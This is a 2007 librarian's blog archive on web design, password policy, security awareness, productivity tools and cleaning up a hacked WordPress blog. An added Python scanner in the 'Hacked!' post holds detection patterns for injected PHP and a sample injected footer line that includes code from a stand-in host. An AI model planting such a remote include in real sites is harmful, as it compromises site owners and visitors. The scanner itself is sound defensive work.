Monthly Archives: December 2007

Get in shape

Um, yeah, not that kind of shape – I’m the last person to be giving *that* advice – but rather the kind of shape that makes for interesting and harmonious design on the web. In the 24 ways blog – 24 daily articles on some aspect of web design/programming, active during the last few holiday seasons – there was an article on the shape of things that make up a website. The author talks about how to make sure that the general shape of your navigational elements, call-outs, informational boxes and the like are working together to make a web page that just works. He talks first about a couple of shapes created by header graphics and navigation that just don’t work – they don’t look like they belong together and they don’t look “right”. Then he goes into several different design concepts and how to apply them to the shapes on your pages. Consistency, Balance and Completion are all discussed, and illustrated, to show you the difference between shapes that are just slapped on a page and forgotten and shapes that make a page look finished and well-put-together.
It’s an interesting read and reminded me that the “squint test” (where you squint up your eyes until you can’t see the words on the page, just the shapes that your words and colors make up) is an important step in the design process! The shapes that make up your headers, navigation and content areas should be in harmony and should work together – not be fighting one another for your visitors’ attention.

My crafty director

The director of my library makes homemade Christmas ornaments, did you know that? I didn’t – but when I came into work today, there was a pretty, handmade ornament sitting on my desk. It looks like everyone on staff got one! That’s a lot of work that went into these things… He has a picture of some of them on his Flickr account.
Christmas Ornaments
I took a picture of the one he gave me (with my phone – my camera was not at hand…) and here is my ornament:
My ornament
What a nice gift from my boss!

CERIAS Weblogs » Security Myths and Passwords

Yesterday, during an interesting conversation on Twitter upon which I shamelessly eavesdropped, the concept of frequently changing passwords being a security vulnerability came up. One of the participants in the conversation (attribution below) posted an article about that very topic. Of course, being a curious sort (why else would I be eavesdropping on other people’s conversations in Twitter? Just because they scroll past the edge of my browser window??), I went to check the article out. CERIAS Weblogs » Security Myths and Passwords is the first of a two-part article that looks, in depth, at why the tried-and-true advice of changing your password frequently may not be the best policy for your organization. I’ve got to say that the arguments were persuasive. We have issues with our staff when it comes to changing passwords – mostly because our part-time staff rarely log into a computer using their own user/pass combo. They use a generic one that works on the desk machines and, as such, they don’t get notices that their password is about to expire. They just can’t log into the web-based email application one day and don’t necessarily realize why! Others seem to have a hard time coming up with a password that is sufficiently complex for our system and still memorable (ok, maybe not just others – I’ve hit this particular issue myself…). Not that I’m about to do away with our password changing policy tomorrow – but the post makes some good points!
What I really liked about the post was the methodical way in which the author made his points. He goes through each of the common ways that people “lose” their passwords to bad guys and shows that most of them don’t seem to be mitigated by the regularly changed password policy. He claims that the “best practice” in this case might not be the best practice for every organization and he suggests that each organization undertake a risk analysis to determine if the frequently changing password policy actually does minimize their risk of getting hacked.
As I mentioned earlier, there is a second part to the article (linked at the bottom of the first post) in which he clarifies some of the questions, concerns and arguments made in the 120 comments left on the first part. Both posts are well worth reading if you have a say in your organization’s security policy. Like I said, I’m not sure ditching the policy is the best choice for us – but it got me thinking about what might actually be the best choice, security wise, for our library…

From the Travelin’ Librarian, Michael Sauers, via Twitter.

Todoist

I’ve been using the free version of Todoist for a bit now and figured I wouldn’t bother blogging about it. There has been a lot written about it already, and I didn’t think that I had much to add. I use it, it’s handy, I’m done. But, as you can see, something has changed that prompted me to write this post. Chains. That’s what has changed – chains.
The folks at Todoist have taken a productivity tip from Jerry Seinfeld and made it into a really nifty little feature on their software. If you enter a recurring task and add the text “!chain” to it, the software will create a chain of boxes that show when the task has been done. This seems like a great way to reinforce any new habit you are trying to create! It’s only available to paid subscribers (those willing to part with $3 a month) but there is a free preview for the free accounts. That (and the colored tag labels) prompted me to shell out the $3 and get a paid account… So far, I have my task list reminding me to write a blog post every 3 days. Let’s see if I can get an unbroken chain of completed tasks for my “blog” project!!

New pages @ the library

Yesterday I went on a web page creating tear! I confirmed that our Outreach department had finished putting in all the information into the Bookmobile’s Google Maps account and I embedded the result into our Bookmobile schedule page. For now, the route information is hand entered by the industrious Outreach staff, but I’ve got a test map in that same account that uses an XML file to get the same results. The next 3-month schedule will use XML to populate the map – that way, all the Outreach staff has to do is change the dates/times in a text file (or a web interface – if I’m feeling ambitious…) and the map is updated and current!
I also finished up a page describing how to access the library’s eAudiobook collection (we get ours through netLibrary) and have downloaded and prepared a “banner ad” for the front page to send curious visitors that way. The collection is already receiving great feedback from our patrons, so the big push now is to get people to realize we offer it!
Finally, I noticed a fresh blog post from Bobbi that pointed to that little bit of red text in the top right corner of our Gmail accounts that asks users to “share your Gmail story”. It encourages folks to create videos telling about their use of Gmail and how great it is – then post them to YouTube. She’s going to steal that idea for us! I know we have at least one staff member who regularly posts original videos to YouTube (using his LL2.0 created blog – how cool is that?), so there has to be other video camera happy folks around here who would be willing to let us know how, why or where they use our services – and how great we are, of course!

Security Awareness

I was just reading through an article on Security Search called “Sophisticated spam, employee errors continue unabated” and remembered that I’d promised to do a post on the whole idea of Security Awareness. The comment in the above article that made me think of this was:

You could have the best practices in place … but we find in more cases than not that it’s human error, not machine error that causes the problems you see today

There was also another incident earlier this week – a local bank got hit hard by a phishing scam. This one was particularly subtle in that it (at least the email portion of it) didn’t have a link to click – it had a phone number to call. Computer professionals tell their co-workers not to ever click on links in emails – do we tell them not to ever call numbers sent to them by an email?

Wikipedia defines Security Awareness as:

knowledge and attitude members of an organization possess regarding the protection of the physical and, especially, information assets of that organization

You’ll notice that there is not much in the way of technology in that definition. Security awareness doesn’t deal with spam filters, network intrusion detection programs or port scanning software – it deals with the education of the front-line, everyday users of our computer networks who have their own jobs to do and don’t have time to keep on top of every security blog, white paper and announcement mailing list out there. Our job, as computer professionals, is to keep on top of that stuff – and pass what we learn on to the people who use our networks. If we don’t, all of the high-tech scanners, detectors and filters won’t help us when one of our co-workers clicks a link, or calls a phone number, in an email and infects the system from the inside.

The general “themes” of security awareness are:

  • nature and proper handling of sensitive materials
  • proper methods for securing sensitive materials on a computer (password policy, authentication, etc.)
  • other security concerns (phishing, malware, social engineering, etc.)
  • physical security issues
  • consequences of following proper security procedures

All of these – even the first two – are very applicable to libraries. We aren’t working in a big corporation with company secrets that can make or break next quarter’s profits – but we are in a position of trust with our patrons to make sure that the information they give us (names, addresses, books they have checked out, etc.) stays safe and outside the reach of anyone who doesn’t have a legitimate court order. We, however, are also in the somewhat unique position of having all of that confidential and sensitive material to keep to ourselves, while also being a place for people to go to get information and use computing resources that we have to make both available and make secure. All of this takes both attention to detail and flexibility from the folks responsible for a library’s network! It also takes education of the *entire* staff as to what all of the things listed above are. They need to be aware of what information we can and can’t give out about patrons and other staff members. They need to be aware of what a social engineering attack is and how to recognize one when they are being scammed. They need to understand that each and every one of them has the power to bring down the library’s network (including the ability to check out books, look up items in the catalog, etc.) by the decisions that they make. The responsibility for making sure they understand this? That part is up to the computer professionals, network administrators and even the computer-savvy staff who work in our organizations.

And after saying all of that, I’ll now pimp the latest project that my library, MRRL, has going. Bobbi and I will be doing a Library Learning 2.1 program that offers a blog posting a week on a particular application or topic that deals with – in some way – Web 2.0. I’m going to focus on posting a regular (maybe monthly, maybe every other month) treatise on some aspect of staying secure while playing with all of these nifty 2.0 toys – and this program is open to both the public and the staff! Any extra awareness about security-related topics is good, so I’m hoping that by making security issues part of this program, I can improve the security awareness of both the staff that use the internal network and the patrons that use our external network (PCC and wireless).

Hacked!

I’d just finished writing up my post for Monday morning on Security Awareness when I happened to check my Twitter feed. In it, I noticed Jay Datema (my editor at LJ for the article I wrote for them) let me know that my blog had been hit by spammers and – even more helpfully – he pointed me to a resource to get it fixed fast. I checked out the WordPress Footer Follies post he referenced and found the fix! Since there were a few differences between our fixes, I’ll post my abbreviated solution here as well. Read the post above for more commentary on the solution!
First, I found the call to an outside file in my footer and deleted it, found another one in my main index.php page, and deleted that one too. I looked for the extra files in wp-includes that Scott mentioned in his post and didn’t see ‘em. I did find the extra code in the default-filters.php file in that directory, though, so I got rid of it. After making sure I got it all, I downloaded the most recent copy of WordPress (I know – should have done that a long time ago…) and uploaded it. I upgraded the blog, then started changing passwords. Now my domain, FTP and WordPress passwords are all different. And no, I won’t tell you what they are.
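As an added example (not code from the original post), here is a small Python check that covers the two things the cleanup above calls for: it scans theme and core PHP files for the kind of call to an outside file that turned up in the footer, index.php and default-filters.php, and it keeps a hash baseline of the install so that any file changed since the last upgrade shows up on the next run. The injection signatures, the example.invalid URL and the file layout are assumptions; the post does not show the injected code itself.

```python
import hashlib
import json
import re
from pathlib import Path

# Signatures of injected PHP/HTML.  These are assumptions: the post only says
# it found "a call to an outside file" in the footer, index.php and
# wp-includes/default-filters.php, not what that code looked like.
SUSPICIOUS = [
    re.compile(r"\b(include|require)(_once)?\b[^;]*['\"]https?://", re.I),
    re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    re.compile(r"<iframe\b[^>]*(display\s*:\s*none|height=['\"]?0)", re.I),
]

# Constructed sample: a theme footer with one injected remote include.
INJECTED_FOOTER = """<div id="footer">
<p>Powered by WordPress</p>
<?php include("http://example.invalid/links.txt"); ?>
</div>"""
CLEAN_FOOTER = """<div id="footer">
<p>Powered by WordPress</p>
</div>"""

def scan_text(text):
    """Return [(line_number, line)] for every line matching a signature."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if any(p.search(line) for p in SUSPICIOUS)]

def hash_tree(root):
    """SHA-256 of each .php file under root, keyed by relative path."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*.php"))}

def diff_baseline(baseline, current):
    """Files added, removed or changed since the baseline was written."""
    return {"added": sorted(set(current) - set(baseline)),
            "removed": sorted(set(baseline) - set(current)),
            "changed": sorted(f for f in baseline.keys() & current.keys()
                              if baseline[f] != current[f])}

def check_install(root, baseline_file):
    """Re-hash the install, diff it against the saved baseline (writing one on
    the first run, e.g. right after a clean upgrade) and scan every new or
    changed file for injection signatures."""
    current = hash_tree(root)
    path = Path(baseline_file)
    if not path.exists():
        path.write_text(json.dumps(current, indent=1))
        return {"added": [], "removed": [], "changed": [], "hits": {}}
    report = diff_baseline(json.loads(path.read_text()), current)
    report["hits"] = {f: scan_text((Path(root) / f).read_text(errors="replace"))
                      for f in report["added"] + report["changed"]}
    return report
```

Run `check_install("/path/to/wordpress", "wp-baseline.json")` once after a clean upgrade to record the baseline, then again on a schedule; anything listed under `changed`, `added` or `hits` deserves a look before the next spammer does.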

Now, I’ll be keeping a close eye on the blog and I’ll be upgrading much more regularly. I’d let it go too long, and I paid for it. If you haven’t upgraded – do it now!

Followup to PLE post

The Ed Techie: My personal work/leisure/learning environment mentions the idea of a Personal Work Environment (PWE) that is quite similar to a PLE (personal learning environment for those not familiar with the term or my earlier post). He has a nifty graphic showing all of the Web 2.0ish stuff he uses in his personal environment (not work-provided like Outlook, just what he uses beyond the work-provided tools). He also comments that it’s really a combination PLE/PWE/PRE (personal recreation environment) because he can do all three things at once with many of these tools. While I’ve taken to the idea of a PLE for a couple of topics I want to either stay on top of (Web 2.0) or learn more about (Security), the idea of compiling and using a PWE is pretty cool as well! The funny part about all this – I found the link via my recently set up Web 2.0 PLE…

I decided, by the way, on Protopages for my PL/W/RE. It’s at http://www.protopage.com/webgoddess if you wanna check it out. So far, the Web 2.0 and Security tabs are the only ones I’ve customized!

Gmail productivity

Have you all heard about the new shortcuts in Gmail? There are a few new things in their recent code roll-out, but the ] and [ shortcut keys are the one I’m finding myself using ALL THE TIME. My Gmail workflow generally has me starting at the bottom (looking at oldest emails first) and working my way to the top. Now, all I have to do is start at the bottom, press the “n” key to get to the next email in the thread, then press the “]” key to go up to the next oldest email in my inbox (and the “[” key goes down to the next youngest email). I can’t tell you how much quicker my email processing is now!

Getting even more things done. Sort of…

ClearContext has come out with version 4 of the IMS (Information Management System, I think – too lazy to look it up right now) just in time to revitalize my personal implementation of the GTD system. I needed it, too! I’ve managed to get my electronic clutter taken care of – zero inbox clutter in either work or Gmail accounts, yay me! – but my physical clutter is still sitting on my desk, waiting for attention… Anyway, the point behind this post is not to brag about the fact that I have NO waiting-for-action emails in my inbox any more (ohhh – can I say that one more time – I’m email free right now!!) but to point you all to the newest edition of this product. It ain’t cheap – $90 for the software, $25 or so to upgrade from version 3, but it’s pretty sweet!
The new feature that prompted me to shell out $25 more on it is the new dashboard. It presents messages, appointments and tasks/actions all in one place, filterable by topic (project) or category (context) or both. This is pretty handy – before I go talk to my boss now (Hi, Bill!) I can filter by my “boss” context, read through recent emails or tasks that I’ve associated with him and have all the information I need. Theoretically. If I manage to keep it up. But it’s too new for me to be thinking so negatively! I’m going to keep on top of my various inboxes and keep everything running this time – not least because playing with the dashboard of this product is so much fun…